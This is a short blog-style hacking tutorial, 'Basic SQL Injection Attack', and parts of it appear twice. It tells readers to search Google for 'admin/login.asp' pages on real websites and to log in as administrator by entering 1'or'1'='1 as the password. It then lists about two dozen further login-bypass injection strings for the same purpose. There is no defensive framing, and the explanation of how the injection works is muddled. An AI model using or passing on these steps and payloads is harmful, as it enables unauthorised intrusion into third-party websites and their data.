4:51 AM
![[Image: star.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s6Wtf9vZTLjUwuq7SMZ52k99vD5AMXGXwEex5KdMdo0al4x-OI_NXFu8YwmMswWwJZyBMhyyn5olymR6YJ8NraK7nX1gFgZK5LWUer8K2FNFKYTeI2=s0-d)
![[Image: ub3rstar.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uLWKn2OioyhH5FAgQAc0bOOcrnxAYc8BNYFAr8BvQbv_AqanjigfwwZYnucpWgbN2t5p2SElfNvzut7uFnKsSZ1_K-jtNMd4O2gFBirfNFnBJlZHdRsL835Q=s0-d)
Basic SQL Injection Attack
For those people who just don't like to read much. I come straight to the point. 
We're gonna hack into an admin account, using SQL injections.
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
![[Image: GkatiJB.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uWOklgtHwktRY7-J7TEncUEqRMrtmZANgRfZK-BEQSjPug3Sap04EDdOYV6usEAGh69OqT23OS3192Ce0OjJAFDA=s0-d)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
![[Image: Vl05pX5.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s4SBmazIa6bHAoTWHTervdHugpGRj_KGVJbjk2rLl61xosJUqhYXxoYIXMXYtWPQuwCO-YmqFDYboduYiDd0YRkA=s0-d)
Well done!! Your now logged in as ADMIN:
![[Image: kvv09kG.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s0EJHA8D_wKZfrel1pVzOheUu-A92EVRYItEJ8T6XyXsiymP0OqjNR9e7DSfnKGTFFIV35aqf_7VNbOlO-X3GqgQ=s0-d)
![[Image: Heq2Tgg.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vtIruNayluh1SahwLERaibBgRZptfWvj2Q9rIX0SCkyIb2HnQdhh0yfQ0eoJ2fNKq0py8mPRI1CwS1Wuo5NhuBCQ=s0-d)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
Spoiler (Click to Hide)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
Spoiler (Click to Hide)
Well done!! Your now logged in as ADMIN:
Spoiler (Click to Hide)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
Spoiler (Click to Hide)
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Note: Websites that record false logins, this is not gonna work on.
I made it simple as it is guys, no long story's.
Post below, for any questions/suggestions/feedback and enjoy!
Post below, for any questions/suggestions/feedback and enjoy!
0 comments:
Post a Comment